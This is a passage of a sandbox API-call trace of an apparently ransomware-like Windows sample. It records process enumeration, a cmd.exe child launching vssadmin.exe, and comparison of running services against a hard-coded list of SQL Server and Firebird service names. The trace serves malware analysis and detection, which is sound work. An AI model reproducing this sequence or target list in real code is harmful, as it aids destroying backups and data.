cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.374] lstrlenW (lpString="svchost.exe") returned 11 [0056.374] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0056.375] lstrlenW (lpString="taskeng.exe") returned 11 [0056.375] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.376] lstrlenW (lpString="taskhost.exe") returned 12 [0056.376] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0056.376] lstrlenW (lpString="called.exe") returned 10 [0056.376] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0056.377] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0056.377] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0056.378] lstrlenW (lpString="analyst.exe") returned 11 [0056.378] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0056.378] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0056.379] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0056.379] lstrlenW (lpString="wages.exe") returned 9 [0056.379] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0056.380] lstrlenW (lpString="rand.exe") returned 8 [0056.380] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0056.381] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0056.381] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0056.381] lstrlenW (lpString="cottage.exe") returned 11 [0056.381] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0056.382] lstrlenW (lpString="pairs_spec.exe") returned 14 [0056.382] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0056.383] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0056.383] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0056.384] lstrlenW (lpString="observationshairy.exe") returned 21 [0056.384] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0056.384] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0056.384] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0056.385] lstrlenW (lpString="spectrum.exe") returned 12 [0056.385] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0056.552] lstrlenW (lpString="dies.exe") returned 8 [0056.553] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0056.554] lstrlenW (lpString="configured.exe") returned 14 [0056.554] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0056.554] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0056.554] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0056.555] lstrlenW (lpString="fast.exe") returned 8 [0056.555] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0056.556] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0056.556] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0056.556] lstrlenW (lpString="review.exe") returned 10 [0056.557] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0056.557] lstrlenW (lpString="historybinding.exe") returned 18 [0056.557] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0056.559] lstrlenW (lpString="pk task surge.exe") returned 17 [0056.559] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.560] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0056.560] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0056.561] lstrlenW (lpString="ivttvf.exe") returned 10 [0056.561] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.561] lstrlenW (lpString="cmd.exe") returned 7 [0056.561] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.562] lstrlenW (lpString="conhost.exe") returned 11 [0056.562] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0056.563] lstrlenW (lpString="vssadmin.exe") returned 12 [0056.563] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0056.564] lstrlenW (lpString="VSSVC.exe") returned 9 [0056.564] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.564] lstrlenW (lpString="svchost.exe") returned 11 [0056.564] Process32NextW (in: hSnapshot=0x154, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0056.565] CloseHandle (hObject=0x154) returned 1 [0056.565] Sleep (dwMilliseconds=0x1f4) [0057.657] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5eff30 [0057.717] EnumServicesStatusExW (in: hSCManager=0x5eff30, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0057.721] GetLastError () returned 0xea [0057.721] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x39626f0 [0057.721] EnumServicesStatusExW (in: hSCManager=0x5eff30, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x39626f0, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x39626f0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0057.724] CloseServiceHandle (hSCObject=0x5eff30) returned 1 [0057.729] lstrlenW (lpString="Appinfo") returned 7 [0057.729] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0057.729] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0057.729] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0057.729] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0057.729] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0057.729] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0057.729] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0057.729] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0057.729] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0057.729] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0057.729] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0057.729] lstrlenW (lpString="AudioSrv") returned 8 [0057.729] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0057.729] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0057.730] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0057.730] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0057.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0057.730] lstrlenW (lpString="BFE") returned 3 [0057.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0057.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0057.730] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0057.730] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0057.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0057.730] lstrlenW (lpString="CryptSvc") returned 8 [0057.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0057.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0057.730] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0057.730] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0057.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0057.730] lstrlenW (lpString="CscService") returned 10 [0057.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0057.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0057.730] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0057.730] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0057.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0057.730] lstrlenW (lpString="DcomLaunch") returned 10 [0057.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0057.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0057.730] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0057.730] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0057.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0057.730] lstrlenW (lpString="Dhcp") returned 4 [0057.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0057.730] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0057.730] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0057.730] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0057.730] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0057.730] lstrlenW (lpString="Dnscache") returned 8 [0057.730] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0057.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0057.731] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0057.731] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0057.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0057.731] lstrlenW (lpString="DPS") returned 3 [0057.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0057.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0057.731] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0057.731] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0057.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0057.731] lstrlenW (lpString="eventlog") returned 8 [0057.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0057.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0057.731] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0057.731] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0057.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0057.731] lstrlenW (lpString="EventSystem") returned 11 [0057.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0057.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0057.731] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0057.731] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0057.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0057.731] lstrlenW (lpString="gpsvc") returned 5 [0057.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0057.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0057.731] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0057.731] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0057.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0057.731] lstrlenW (lpString="iphlpsvc") returned 8 [0057.731] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0057.731] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0057.731] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0057.731] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0057.731] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0057.731] lstrlenW (lpString="LanmanServer") returned 12 [0057.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0057.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0057.732] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0057.732] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0057.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0057.732] lstrlenW (lpString="LanmanWorkstation") returned 17 [0057.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0057.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0057.732] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0057.732] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0057.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0057.732] lstrlenW (lpString="lmhosts") returned 7 [0057.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0057.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0057.732] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0057.732] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0057.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0057.732] lstrlenW (lpString="MMCSS") returned 5 [0057.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0057.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0057.732] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0057.732] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0057.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0057.732] lstrlenW (lpString="MpsSvc") returned 6 [0057.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0057.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0057.732] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0057.732] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0057.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0057.732] lstrlenW (lpString="Netman") returned 6 [0057.732] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0057.732] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0057.732] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0057.732] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0057.732] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0057.733] lstrlenW (lpString="netprofm") returned 8 [0057.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0057.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0057.733] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0057.733] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0057.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0057.733] lstrlenW (lpString="NlaSvc") returned 6 [0057.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0057.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0057.733] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0057.733] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0057.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0057.733] lstrlenW (lpString="nsi") returned 3 [0057.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0057.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0057.733] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0057.733] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0057.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0057.733] lstrlenW (lpString="PcaSvc") returned 6 [0057.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0057.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0057.733] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0057.733] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0057.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0057.733] lstrlenW (lpString="PlugPlay") returned 8 [0057.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0057.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0057.733] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0057.733] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0057.733] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0057.733] lstrlenW (lpString="Power") returned 5 [0057.733] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0057.733] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0057.733] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0057.734] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0057.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0057.734] lstrlenW (lpString="ProfSvc") returned 7 [0057.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0057.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0057.734] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0057.734] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0057.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0057.734] lstrlenW (lpString="RpcEptMapper") returned 12 [0057.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0057.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0057.734] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0057.734] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0057.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0057.734] lstrlenW (lpString="RpcSs") returned 5 [0057.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0057.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0057.734] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0057.734] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0057.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0057.734] 